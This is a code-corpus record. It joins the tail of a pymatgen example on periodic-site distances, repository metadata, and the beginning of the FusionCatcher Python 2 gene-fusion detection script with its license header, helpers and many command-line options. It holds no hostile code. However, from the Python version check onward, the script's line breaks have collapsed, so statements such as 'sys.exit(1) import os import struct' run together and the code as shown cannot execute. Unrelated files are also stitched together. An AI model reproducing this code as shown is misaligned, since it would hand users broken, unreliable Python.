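# defined above, using only names this module already imports or defines
# (Lattice.cubic is assumed to be the standard pymatgen cubic-cell
# constructor).
if __name__ == "__main__":
    lat = Lattice.cubic(4.0)  # 4 Angstrom cubic cell
    s1 = PeriodicSite("Fe", [0.01, 0.0, 0.0], lat)
    s2 = PeriodicSite("O", [0.99, 0.0, 0.0], lat)
    # Nearest periodic image: fractional gap 0.02 -> 0.02 * 4.0 = 0.08 A
    print(s1.distance(s2))
    # Forcing the same-cell image ([0, 0, 0]) gives 0.98 * 4.0 = 3.92 A
    print(s1.distance(s2, jimage=[0, 0, 0]))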
Dioptas/pymatgen
pymatgen/core/sites.py
Python
mit
18,056
[ "pymatgen" ]
2b9b39302e474fa717789a48e58ad3fc67e16faf45fecc6e787097cbcb360ee6
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""

==============================================================================
FusionCatcher
==============================================================================

FusionCatcher searches for novel somatic fusion genes in RNA-seq
paired-end/single-end reads data produced by the Illumina Solexa platforms
(for example: Solexa/HiSeq/NextSeq/MiSeq/MiniSeq).

Author: Daniel Nicorici, Daniel.Nicorici@gmail.com

Copyright (c) 2009-2021 Daniel Nicorici

This file is part of FusionCatcher.

FusionCatcher is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

FusionCatcher is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with FusionCatcher (see file 'COPYING.txt'). If not, see
<http://www.gnu.org/licenses/>.

By default, FusionCatcher runs the BLAT aligner
<http://users.soe.ucsc.edu/~kent/src/> but it also offers the option to
disable all of its scripts which make use of the BLAT aligner, if you choose
explicitly to do so. BLAT's license does not allow it to be used for
commercial activities. If the BLAT license does not allow it to be used in
your case, then you may still use FusionCatcher by forcing it not to use the
BLAT aligner, via the option '--skip-blat'. For more information regarding
BLAT please see its license.

Please, note that FusionCatcher does not require BLAT in order to find
candidate fusion genes!

"""
import sys
if sys.version_info > (3, 0):
    print "ERROR: Python 3 or newer detected! Python 2.X is needed!\n\
FIX: run '/some/python/2.7/python bootstrap.py" sys.exit(1) import os import struct import optparse import multiprocessing import subprocess import shutil import socket import locale import math import configuration # for sort in linux locale.setlocale(locale.LC_ALL, 'C') # bowtie seed bowtie_seed = "123456" def expand(*p): return os.path.abspath(os.path.expanduser(os.path.join(*p))) def islink(alink = None): """ Wrapper for: os.path.islink() """ f = False if alink: alink = alink[:-1] if alink.endswith(os.sep) else alink if os.path.islink(alink): f = True return f # get the path of this script pipeline_path = os.path.dirname(expand(sys.argv[0])) def outdir(*more_paths): global out_dir return os.path.join(out_dir,*more_paths) def datadir(*more_paths): global data_dir return os.path.join(data_dir,*more_paths) def tmpdir(*more_paths): global tmp_dir return os.path.join(tmp_dir,*more_paths) # make sure that a directory ends with path separator such that workflow can # recognize it as directory def adir(a_dir): if (not a_dir.endswith('\\')) and (not a_dir.endswith('/')): a_dir = a_dir + os.sep return a_dir # # # test if a command line option has been passed def is_optparse_provided(parser, dest): r = False sysargv = set([e.split("=")[0] for e in sys.argv[1:]]) for opt in parser._get_all_options(): if opt.dest == dest: if opt._long_opts and opt._long_opts[0] in sysargv: r = True break if opt._short_opts and opt._short_opts[0] in sys.argv: r = True break return r # if any (opt.dest == dest and (opt._long_opts[0] in sys.argv[1:] or (False if (not opt._short_opts) else opt._short_opts[0] in sys.argv[1:])) for opt in parser._get_all_options()): # return True # return False # # # def empty(a_file): f = True if (os.path.isfile(a_file) or islink(a_file)): s = os.path.getsize(a_file) if s < 100: d = [line for line in file(a_file,'r').readlines() if line.rstrip('\r\n')] if d: f = False else: f = False return f # # # def delete_file(some_file): some_file = some_file[:-1] if some_file.endswith(os.sep) else some_file if os.path.isfile(some_file) or islink(some_file): os.remove(some_file) # # # def memory(unit='default'): meminfo = {'MemTotal':0,'free':0,'used':0,'unit':'kB','total':0} if os.path.isfile('/proc/meminfo'): meminfo = [line.split() for line in file('/proc/meminfo').readlines()] t = meminfo[0][-1].strip() meminfo = dict([(line[0].rstrip(':'),int(line[1])) for line in meminfo]) # meminfo['MemTotal'] # e.g. 
3921852 meminfo['free'] = meminfo['MemFree'] + meminfo['Buffers'] + meminfo['Cached'] meminfo['used'] = meminfo['MemTotal'] - meminfo['free'] meminfo['unit'] = t meminfo['total'] = meminfo['MemTotal'] if unit.upper() == 'GB' and t.upper() == 'KB': for k in meminfo.keys(): if k != 'unit': meminfo[k] = float(meminfo[k])/(1024*1024) meminfo['unit'] = 'GB' elif unit.upper() == 'MB' and t.upper() == 'KB': for k in meminfo.keys(): if k != 'unit': meminfo[k] = float(meminfo[k])/1024 meminfo['unit'] = 'MB' return meminfo # # # def info(ajob, fromfile, tofile , top = "\n\n\n", bottom = "\n\n\n" , temp_path = 'no'): if ajob.run(): aux = open(tofile,'a') top = str(top).splitlines() if type(top).__name__ == 'str' else top bottom = str(bottom).splitlines() if type(bottom).__name__ == 'str' else bottom ajob.write("APPENDING to file: '%s'.\n"% (tofile,)) for line in top: t = line.rstrip('\r\n')+'\n' aux.write(t) ajob.write(">%s" % (t,)) if fromfile: ajob.write(">from file: '%s'\n"% (fromfile,)) for line in file(fromfile,'r').readlines(): t = line.rstrip('\r\n')+'\n' aux.write(t) for line in bottom: t = line.rstrip('\r\n')+'\n' aux.write(t) ajob.write(">%s" % (t,)) aux.close() if fromfile: ajob.clean(fromfile,temp_path = temp_path) # # command line parsing # class MyOptionParser(optparse.OptionParser): def format_epilog(self, formatter): return self.epilog def is_known_extension(something): kx = ['fastq.gz','.fq.gz', '.fastq.bz2','.fq.bz2', '.fastq.zip','.fq.zip', '.fastq.xz','.fq.xz', '.fastq', '.fq', '.sra', '.bam'] sign = False for ekx in kx: if something.lower().endswith(ekx): sign = True break # skip readme files if (something.lower().startswith('readme') or something.lower().startswith('index.') or something.lower().startswith('checksum') or something.startswith('.') or something.lower().startswith('md5')): sign = False return sign usage = "%prog [options]" epilog = ("\n" + "Author: Daniel Nicorici \n" + "Email: Daniel.Nicorici@gmail.com \n" + "Copyright (c) 2009-2021, Daniel Nicorici \n " + "\n") description = ("FusionCatcher searches for novel and known somatic gene fusions in RNA-seq \n"+ "paired-end/single-end reads data produced by the Illumina sequencing \n"+ "platforms (like for example: Illumina HiSeq 2500, \n"+ "Illumina HiSeq 2000, Illumina HiSeq X, Illumina NextSeq 500, \n"+ "Illumina GAIIx, Illumina GAII, Illumina MiSeq, Illumina MiniSeq). \n") version = "%prog 1.33" if __name__ == "__main__": parser = MyOptionParser( usage = usage, epilog = epilog, description = description, version = version ) parser.add_option("--input","-i", action = "store", type = "string", dest = "input_filename", help = "The input file(s) or directory. The files should be "+ "in FASTQ or SRA format and may be or not compressed "+ "using gzip or zip. "+ "A list of files can be specified by given the "+ "filenames separated by comma. If a directory is given "+ "then it will analyze all the files found with the "+ "following extensions: .sra, "+ ".fastq, .fastq.zip, .fastq.gz, .fastq.bz2, fastq.xz, "+ ".fq, .fq.zip, .fq.gz, .fq.bz2, fz.xz, "+ ".txt, .txt.zip, .txt.gz, .txt.bz2 ." 
) parser.add_option("--batch", action = "store_true", dest = "batch_mode", default = False, help = "If this is used then batch mode is used "+ "and the input specified using '--input' or '-i' is: "+ "(i) a tab-separated text file containing a each line such "+ "that there is one sample per line and first column are the "+ "FASTQ files' full pathnames/URLs, separated by commas, corresponding to the "+ "sample and an optional second column containing the name for the sample, or "+ "(ii) a input directory which contains a several subdirectories such that each "+ "subdirectory corresponds to only one sample and it contains all the FASTQ files "+ "corresponding to that sample. This is useful when several samples needs to be analyzed." ) parser.add_option("--single-end", action = "store_true", dest = "single_end", default = False, help = "If this is used then it is assumed that all the input reads are single-end reads "+ "which must be longer than 130 bp. "+ "Be default it is assumed that all input reads come from a paired-end reads." ) parser.add_option("--normal","-I", action = "store", type = "string", dest = "normal_matched_filename", help = "The input file(s) or directory containing the "+ "healthy normal-matched data. They should be given in the same "+ "format as for '--input'. In case that this option is used "+ "then the files/directory given to '--input' is considered "+ "to be from the sample of a patient with disease. This is optional." ) parser.add_option("--output","-o", action = "store", type = "string", dest = "output_directory", help = "The output directory where all the output files "+ "containing information about the found candidate fusion"+ "genes are written. Default is '%default'.") parser.add_option("--data","-d", action = "store", type = "string", dest = "data_directory", help = "The data directory where all the annotations files "+ "from Ensembl database are placed, e.g. 'data/'. "+ "This directory should be built using 'fusioncatcher-build'. "+ "If it is not used then it is read from configuration file "+ "specified with '--config' from 'data = ...' line.") parser.add_option("--tmp","-T", action = "store", type = "string", dest = "tmp_directory", default = "tmp", help = "The temporary directory where all the outputs files "+ "and directories will be written. Default is directory "+ "'%default' in the output directory specified with '--output'. ") parser.add_option("--threads","-p", action = "store", type = "int", dest = "processes", default = 0, help = "Number or processes/threads to be used for running SORT, Bowtie, "+ "BLAT, STAR, BOWTIE2 and other tools/programs. "+ "If it is 0 (as it is by default) then the number of processes/threads will be "+ "read first from 'fusioncatcher/etc/configuration.cfg' file. If even there it is still set to 0 then "+ "'min(number-of-CPUs-found,32)' processes will be used. Setting number of threads in 'fusioncatcher/etc/configuration.cfg' "+ "might be usefull in situations where one server is shared between several users and in order to limit FusionCatcher using all the CPUs/resources. "+ "Default is '%default'. ") parser.add_option("--config", action = "store", type = "string", dest = "configuration_filename", default = os.path.abspath(os.path.join(pipeline_path,"..","etc","configuration.cfg"))+','+os.path.abspath(os.path.join(pipeline_path,"configuration.cfg")), help = "Configuration file containing the paths to external "+ "tools (e.g. Bowtie, Blat, fastq-dump.) in case that "+ "they are not specified in PATH variable! 
"+ "Default is '%default'.") parser.add_option("--force-paths","-F", action = "store_true", dest = "force_paths", default = False, help = "If it is specified then all external tools and all Python tools "+ "will be executed by FusionCatcher by using their corresponding absolute paths, "+ "which will be obined from the fusioncatcher/bin/configuration.cfg file. "+ "By default no paths are specified when executing tools/scripts. "+ "Default is '%default'. ") parser.add_option("--no-update-check","-Z", action = "store_true", dest = "skip_update_check", default = False, help = "Skips the automatic routine that contacts the "+ "FusionCatcher server to check for a more recent version. "+ "Default is '%default'. ") parser.add_option("--5keep","-l", action = "store", type = "int", dest = "trim_3end_keep", default = 60, # 60 # 68 help = optparse.SUPPRESS_HELP # "This may be seen as seed length. For Bowtie aligner the reads "+ # "longer than '%default' will be trimmed from "+ # "their 3-end such that to become exactly '%default' bp long. "+ # "Reads shorter than '%default' will not be trimmed. " + # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT/STAR/BOWTIE2 aligners. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' should be used! The trimming of reads for "+ # "BLAT/STAR/BOWTIE2 aligners is done using the option '--trim-psl-5keep'. "+ # "Default is '%default'." ) parser.add_option("--5keep2", action = "store", type = "int", dest = "trim_3end_keep2", default = 23, # 27 help = optparse.SUPPRESS_HELP # "After trimming using '--5keep' then a second round of trimming will "+ # "be done on unmapped reads to try to come with extra candidate fusion genes. "+ # "If this set to 0 then the trimming is disabled. " # "Default is '%default'." ) parser.add_option("--5end","-5", action = "store", type = "int", dest = "trim_5end", default = 0, help = optparse.SUPPRESS_HELP # "It trims all the reads from their 5-end with the "+ # "given size. "+ # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT aligner. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' or '--trim-psl-5end' should be used! "+ # "Default is '%default'." ) parser.add_option("--3end","-3", action = "store", type = "int", dest = "trim_3end", default = 0, help = optparse.SUPPRESS_HELP # "It trims all the reads from their 3-end with the "+ # "given size. "+ # "The trimming priorities are '--5end','--3end','--5keep'. " + # "if several trimming options are used simultaneously. "+ # "The trimming is done by default only to the reads used "+ # "for BOWTIE aligner but not for BLAT aligner. In order "+ # "to apply the trimming also the reads used by BLAT/STAR/BOWTIE2 aligners "+ # "option '--trim-psl' should be used! "+ # "Default is '%default'." ) parser.add_option("--trim-psl", action = "store_true", dest = "trim_psl", default = False, help = optparse.SUPPRESS_HELP # "If it is specified then also the reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners are trimmed using the parameters given "+ # "by command line arguments '--5keep', '--5end', and '--3end'. 
"+ # "By default the trimming options "+ # "'--5keep', '--5end', '--3end' are trimming the reads only for "+ # "for the BOWTIE method but not when BLAT/STAR/BOWTIE2 are used. "+ # "Default is '%default'." ) parser.add_option("--trim-psl-5keep","-x", action = "store", type = "int", dest = "trim_psl_3end_keep", default = 82, # 80 help = optparse.SUPPRESS_HELP # "This may be seen as seed length. All reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners and which "+ # "are longer than '%default' will be trimmed from "+ # "their 3-end such that to become exactly '%default' bp long. "+ # "The reads given as input to Bowtie are not trimmed using this "+ # "option. It should be set to 0 if no trimming should be done "+ # "for BLAT/STAR/BOWTIE2. "+ # "Default is '%default'." ) parser.add_option("--trim-psl-5end", action = "store_true", dest = "trim_psl_5end", default = False, help = optparse.SUPPRESS_HELP # "If it is specified then also the reads given as input "+ # "to BLAT/STAR/BOWTIE2 aligners are trimmed using the parameters given "+ # "by command line argument '--5end'. "+ # "By default the trimming options "+ # "'--5keep', '--5end', '--3end' are trimming the reads only for "+ # "for the BOWTIE method but not when BLAT/STAR/BOWTIE2 are used. "+ # "Default is '%default'." ) parser.add_option("--trim-quality","-Q", action = "store", dest = "trim_quality", type = "int", default = 5, help = optparse.SUPPRESS_HELP # "The input reads will be trimmed from their 3'end "+ # "when the quality scores are below the given threshold, e.g. 5 for Q5. "+ # "Default is '%default'." ) parser.add_option("--trim-wiggle", action = "store", dest = "trim_wiggle", type = "int", default = 0, # it was 2 help = optparse.SUPPRESS_HELP # "The input reads will be trimmed during the alignment "+ # "from their 5' and 3' ends for filtering only purposes. "+ # "Default is '%default'." ) parser.add_option("--trimfq", action = "store", dest = "trimfq", type = "float", default = 1.00, help = optparse.SUPPRESS_HELP # "If this is set less than 1.00 the quality then the quality "+ # "trimming will be done using Phred algorithm in addition to "+ # "quality filtering which is already done by default. "+ # "For this the 'seqtk trimfq' tool is used and also the input "+ # "reads should have quality score in Sanger format. A recommended value "+ # "here for quality trimming is 0.05 (which is the default value of 'seqtk trimfq') or 0.10." ) parser.add_option("--skip-trim-multiple-5", action = "store_true", dest = "skip_trim_multiple_5", default = False, help = optparse.SUPPRESS_HELP # "It trims the 3' ends of the reads to multiple of 5, "+ # "for example 51bp to 50bp. It looks like for Illumina "+ # "reads the last 51 or 76 or 101 or 151 is really bad quality." ) parser.add_option("--skip-filter-low-entropy", action = "store_true", dest = "skip_filter_low_entropy", default = False, help = optparse.SUPPRESS_HELP # "It masks with Ns the low entropy regions in reads."+ ) parser.add_option("--skip-parsort", action = "store_true", dest = "skip_parsort", default = False, help = "It skips using GNU PARSORT and instead is using classic SORT." ) parser.add_option("--skip-fastqtk", action = "store_true", dest = "skip_fastqtk", default = False, help = "It skips using FASTQTK." 
) mydefault = sorted([ "paralogs", "pair_pseudo_genes", "similar_reads", "ambiguous", "similar_symbols", "ensembl_fully_overlapping", "ensembl_same_strand_overlapping", # 'ucsc_fully_overlapping', # 'ucsc_same_strand_overlapping', 'refseq_fully_overlapping', 'refseq_same_strand_overlapping', "dist1000bp", "rrna", "trna", "mt", "mirna", "yrna", "7skrna", "snorna", "snrna", "cta", "ctb", "ctc", "ctd", "rp", "rp11", "banned", "healthy", "hla", "conjoing", "metazoa", "bodymap2", "hpa", "1000genomes", # "non_tumor_cells", "multi", "fragments", "removed"]) all_choices = sorted([ 'paralogs', 'adjacent', 'ambiguous', 'dist1000bp', 'chimer2', 'chimer4kb', 'chimer4pub', 'chimer4seq', 'cacg', 'cgp', 'duplicates', 'bodymap2', 'hpa', "1000genomes", 'gtex', 'metazoa', 'rt_circ_rna', 'similar_reads', 'similar_symbols', 'short_distance', 'yrna', '7skrna', 'rrna', 'trna', 'mt', 'lncrna', 'mirna', 'mitelman', 'oncokb', 'pseudogene', 'snorna', 'snrna', 'pair_pseudo_genes', 'prostate_cancer', 'rp', 'rp11', 'ensembl_fully_overlapping', 'ensembl_partially_overlapping', 'ensembl_same_strand_overlapping', 'ribosomal', 'cta', 'ctb', 'ctc', 'ctd', 'conjoing', 'healthy', 'ucsc_fully_overlapping', 'ucsc_partially_overlapping', 'ucsc_same_strand_overlapping', 'refseq_fully_overlapping', 'refseq_partially_overlapping', 'refseq_same_strand_overlapping', 'gencode_fully_overlapping', 'gencode_partially_overlapping', 'gencode_same_strand_overlapping', 'dist10kbp', 'dist100kbp', 'fragments', 'banned', 'hla', 'non_tumor_cells', 'non_cancer_tissues', 'removed', 'tcga', 'tcga2', 'tcga-normal', 'tcga-cancer']) parser.add_option("--filter-fusion","-b", action = "store", type = "string", dest = "biotypes", default = ','.join(sorted(mydefault)), help = optparse.SUPPRESS_HELP) # help = "Candidate gene fusions to be skipped from further "+ # "analysis in case that one of "+ # "partner gene or both genes (which form a fusion) "+ # "are specified here. "+ # "All possible values are: ["+', '.join(sorted(all_choices))+"]. "+ # "'short_distance' is used for labeling the "+ # "candidate fusion genes which do meet the criteria "+ # "specified with '--min-dist-fusion'. "+ # "Several can be chosen but in this case they " + # "should comma separated. "+ # "Default is '%default'.") parser.add_option("--filter-fusion-add","-B", action = "store", type = "string", dest = "biotypes_more", help = optparse.SUPPRESS_HELP) # help = "Any label of fusion genes specified here will be "+ # "appended to the list given to '--filter-fusion'. "+ # "This is just an easy way to add more to '--filter-fusion'. "+ # "For more read the description of '--filter-fusion'. "+ # "Default is '%default'.") parser.add_option("--dist-fusion","-D", action = "store", type = "int", dest = "min_dist", default = 200000, help = optparse.SUPPRESS_HELP) # "The candidate fusion genes where the distance "+ # "between the genes is below this threshold will be marked "+ # "using the label 'custom_distance' "+ # "Default is '%default'.") parser.add_option("--all-reads-fusion","-A", action = "store_true", dest = "all_reads_junction", default = False, help = optparse.SUPPRESS_HELP) # "If it is specified then all reads (reads which form "+ # "a pair and single reads which do not have a mate "+ # "read because their mate has been removed due to "+ # "different reasons, like for example low quality), "+ # "will be used for finding the fusion point, which "+ # "is the exon-exon junction. 
If not specified then only "+ # "reads which form a pair will be used for "+ # "finding the exon-exon junction (one read maps on one "+ # "of the transcripts of the gene involved in the fusion "+ # "and its mate will map on the exon-exon junction). "+ # "Default is '%default'." parser.add_option("--homolog-fusion","-H", action = "store", type = "float", dest = "homolog", default = float(1)/float(8*(10**4)),#float(1)/float(2*(10**5)), # float(1)/float(8*(10**4)),# float(1)/float(5*(10**4)), help = optparse.SUPPRESS_HELP) # "The minimum number of reads (as percentage [0..1]) "+ # "which map simultaneously "+ # "onto two genes in order to be considered homologous. "+ # "If set to 0 then no homology analysis is done. "+ # "This information is used for filtering out candidate "+ # "fusion genes which are homologous. "+ # "Default is '%default'." parser.add_option("--filter-str", action = "store", type = "float", dest = "filter_str", default = 0, #1.4, # 2.1 help = optparse.SUPPRESS_HELP) # help = "If specified to 0 then it skips filtering out the reads "+ # "which contain STR (short tandem repeats). "+ # "Default is '%default'." parser.add_option("--visualization-psl", action = "store_true", dest = "psl_visualization", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use the BLAT "+ # "aligner for aligning the reads which support the "+ # "newly found candidate fusion genes. Please, note "+ # "that BLAT license does not allow BLAT to be used for "+ # "commercial activities. Fore more information "+ # "regarding BLAT please see its license: "+ # "<http://users.soe.ucsc.edu/~kent/src/>. Also please, note "+ # "that this option is not actively supported anymore and "+ # "in the future will be deprecated. If one still wants "+ # "to use it, then one should run this 'faToTwoBit genome.fa genome.2bit -noMask') "+ # "in 'fusioncatcher/data/current/'. Instead it is recommended to use "+ # "'--visualization-sam'. This will be deprecated in the future. "+ # "Default is '%default'.") parser.add_option("--visualization-sam", action = "store_true", dest = "sam_visualization", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will use the BOWTIE2 "+ # "aligner for aligning the reads which support the "+ # "newly found candidate fusion genes. "+ # "Default is '%default'.") parser.add_option("--assembly","-M", action = "store_true", dest = "assembly", default = False, help = optparse.SUPPRESS_HELP) # help = "If used then the reads found to support the newly "+ # "found candidate fusion genes are assembled using "+ # "VELVET <http://www.ebi.ac.uk/~zerbino/velvet/>. "+ # "This will be deprecated in the future. " + # "Default is '%default'.") parser.add_option("--sonication", action = "store", type = "int", dest = "sonication", default = 130, help = optparse.SUPPRESS_HELP) # help = "In case that the input reads are longer than the threshold set here "+ # "then they will be broken up bioinformatically in smaller reads. "+ # "If this is set to 0 then no break up will be done. "+ # "Default is '%default'.") parser.add_option("--bridges", action = "store", type = "int", dest = "bridges", default = 0, help = optparse.SUPPRESS_HELP) # help = "Number of encompasses paired-reads to be generated for each input long read. "+ # "If it is set to 0 then the number will chosen automatically based on "+ # "the length of input reads, i.e. ceil(length_read/160). " + # "Default is '%default'." 
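# Hedged worked example (illustrative only; the read length is made up): the
# suppressed help texts for '--sonication' and '--bridges' above state that
# input reads longer than 130 bp are broken up bioinformatically into shorter
# reads, and that when '--bridges' is 0 the number of generated encompassing
# read pairs defaults to ceil(length_read/160). For a hypothetical 300 bp
# read ('math' is already imported at the top of this script):
#
#     read_length = 300
#     bridges = int(math.ceil(read_length / 160.0))   # -> 2 read pairs
#
# i.e. two encompassing paired-reads are produced per 300 bp input read.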
parser.add_option("--skip-deduplication", action = "store_true", dest = "skip_deduplication", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out "+ # "the reads which are duplicates to each other. "+ # "Default is '%default'." ) # parser.add_option("--skip-super-fast-prefilter", # action = "store_true", # dest = "skip_superfast", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript. "+ ## "Default is '%default'." # ) parser.add_option("--prefilter", action = "store", type = "string", dest = "prefilter", default = "1", # help = optparse.SUPPRESS_HELP) # help = " 0 - no pre-filtering "+ # " 1 - pre-filtering done in the very beginning "+ # " 2 - pre-filtering done later than 1 "+ # " 3 - pre-filtering done later than 2 "+ # "Default is '%default'." # ) # parser.add_option("--skip-later-filter", # action = "store_true", # dest = "skip_later_filter", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript. "+ ## "Default is '%default'." # ) # parser.add_option("--fast-prefilter", # action = "store_true", # dest = "fast", # default = False, # help = optparse.SUPPRESS_HELP ## help = "If specified then it skips filtering out "+ ## "the reads which mapping on same transcript BUT "+ ## "before the FASTQ are trimmed and merged. "+ ## "Default is '%default'." # ) parser.add_option("--skip-filter-mt", action = "store_true", dest = "skip_mitochondrion_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads "+ # "which map on the mitochondrion. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-vir", action = "store_true", dest = "skip_viruses_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads "+ # "which map on known genomes of viruses. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-b", action = "store_true", dest = "skip_b_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads with "+ # "B quality scores (i.e. low quality) which are a special "+ # "indicator in "+ # "Fastq Illumina files. Default is '%default'." ) parser.add_option("--filter-ambiguous","-Y", action = "store_true", dest = "ambiguous_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it filters out the reads which "+ # "maps ambiguously (i.e. same read map simultaneously on two "+ # "locuses on genome/transcriptome within 0-3 mismatches. " # "Default is '%default'." ) parser.add_option("--skip-filter-genome","-G", action = "store_true", dest = "skip_genome_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "maps multiple times on genome. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-unmapped-pairs", action = "store_true", dest = "skip_unmapped_pairs_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the pair of reads which "+ # "are unmapped. "+ # "Default is '%default'." 
) parser.add_option("--skip-filter-genome-transcriptome", action = "store_true", dest = "skip_genome_transcriptome_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "map better on genome than on transcriptome. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-adapter", action = "store_true", dest = "skip_adapter_filtering", default = False, help = optparse.SUPPRESS_HELP # help = "If specified then it skips filtering out the reads which "+ # "contains the adapters. "+ # "Default is '%default'." ) parser.add_option("--skip-filter-psl", action = "store_true", dest = "skip_prefiltering_psl", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not prefilter "+ # "the short reads which will be used for doing BLAT/STAR/BOWTIE2 alignment. "+ # "By default, the short reads are prefiltered before "+ # "being aligned using BLAT/STAR/BOWTIE2 in order to speed up the BLAT/STAR/BOWTIE2 "+ # "alignment which is time and computationally demanding. "+ # "The disadvantage of doing prefiltering is that the sensitivity "+ # "of BLAT/STAR/BOWTIE2 alignment is somewhat lowered. "+ # "Default is '%default'.") parser.add_option("--skip-interleave", action = "store_true", dest = "skip_interleave_processing", default = False, help = optparse.SUPPRESS_HELP) # help = "If specified then it skips interleaving the short reads "+ # "from the input FASTQ files. The program tries automatically "+ # "to pair the forward and reverse short reads based on file "+ # "names. In case that the pair is done wronlgy then this "+ # "argument should be used to remedy the problem. "+ # "Default is '%default'.") parser.add_option("--skip-known-fusions", action = "store_true", dest = "skip_known_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not use its own database "+ # "and COSMIC database of already known fusion genes! "+ # "Here skipping means that the known fusion genes will "+ # "treated as any other candidate fusion genes "+ # "and if there is enough evidence will be shown in the "+ # "final list of found fusion genes. By default, the known "+ # "fusion genes are treated preferentially and are pushed "+ # "directly to the very final step of finding the junction "+ # "point. " + # "Default is '%default'.") parser.add_option("--skip-adjacent", action = "store_true", dest = "skip_adjacent", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the pipeline will not seach for "+ # "candidate fusion genes where the genes are adjacent! "+ # "By default the candidate fusion genes which have "+ # "genes that are adjacent are analysed also but in many cases "+ # "they are just annotation errors in the Ensembl database "+ # "and maybe they are not real fusion genes. "+ # "Default is '%default'.") parser.add_option("--skip-banned-fusions", action = "store_true", dest = "skip_banned_fusions", default = False, help = optparse.SUPPRESS_HELP) # help = "If it is set then the list of known banned fusion "+ # "genes (which are found in healthy samples) is not used. "+ # "Default is '%default'.") parser.add_option("--keep-viruses-alignments","-V", action = "store_true", dest = "keep_viruses", default = False, help = "If it is set then the SAM alignments files of reads mapping on "+ "viruses genomes are saved in the output directory "+ "for later inspection by the user. 
"+ "Default is '%default'.") parser.add_option("--keep-unmapped-reads","-U", action = "store_true", dest = "keep_unmapped_reads", default = False, help = "If it is set then the FASTQ files, containing "+ "the unmapped reads (i.e. reads which do not map "+ "on genome and transcriptome), are saved in the output directory "+ "for later inspection by the user. "+ "Default is '%default'.") parser.add_option("--skip-compress-ids", action = "store_true", dest = "skip_compress_ids", default = False, help = optparse.SUPPRESS_HELP # help = "If it is set then the reads ids will not be compressed "+ # "(i.d. renamed) using lossy compression and "+ # "the original reads ids will be kept thru the whole "+ # "run of FusionCatcher. Be default the reads ids will be "+ # "compressed using lossy compression. "+ # "Default is '%default'." ) parser.add_option("--compress-transcripts", action = "store_true", dest = "compress_transcripts", default = False, help = optparse.SUPPRESS_HELP # help = "It compresses the fusions transcripts sequences in the final report by "+ # "outputing the transcripts ids instead of the sequences "+ # "of the fusion transcripts "+ # "Default is '%default'." ) parser.add_option("--skip-automatic-scaling", action = "store_true", dest = "skip_automatic_scaling", default = False, help = optparse.SUPPRESS_HELP # help = "If it is set then the thresholds for anchor length, "+ # "spanning reads, and spanning pairs will not be adjusted "+ # "automatically according to the input reads. "+ # "Default is '%default'." ) parser.add_option("--ff-tryhard", action = "store_true", dest = "ff_tryhard", default = False, help = optparse.SUPPRESS_HELP # help = "If it is specified then '--tryhard' will be used for 'bowtie' when '--ff' is used. "+ # "Default is '%default'." ) parser.add_option("--aligners", action = "store", type = "string", dest = "aligners", default = os.path.abspath(os.path.join(pipeline_path,"..","etc","configuration.cfg"))+',' + "blat,star", help = "The aligners to be used on Bowtie aligner. "+ "By default always BOWTIE aligner is used and it "+ "cannot be disabled. The choices are: "+ "['blat','star','bowtie2']. Any combination of these is "+ "accepted if the aligners' names are comma separated. "+ "For example, if one wants to used all four aligners "+ "then 'blat,star,bowtie2' should be given. "+ "The command line options '--skip-blat', '--skip-star', "+ "and '--skip-bowtie2' have priority over this option. "+ "If the first element in the list is the configuration file "+ "(that is '.cfg' file) of FusionCatcher "+ "then the aligners specified in the list of "+ "aligners specified in the configuration file will "+ "be used (and the rest of aligner specified here "+ "will be ignored). "+ "In case that the configuration file is not found "+ "then the following aligners from the list will be used. " "Default is '%default'.") parser.add_option("--skip-blat", action = "store_true", dest = "skip_blat", default = False, help = "If it is set then the pipeline will NOT use the BLAT "+ "aligner and all options and methods which make use of "+ "BLAT will be disabled. "+ "BLAT aligner is used by default. Please, note "+ "that BLAT license does not allow BLAT to be used for "+ "commercial activities. Fore more information "+ "regarding BLAT please see its license: "+ "<http://users.soe.ucsc.edu/~kent/src/>. 
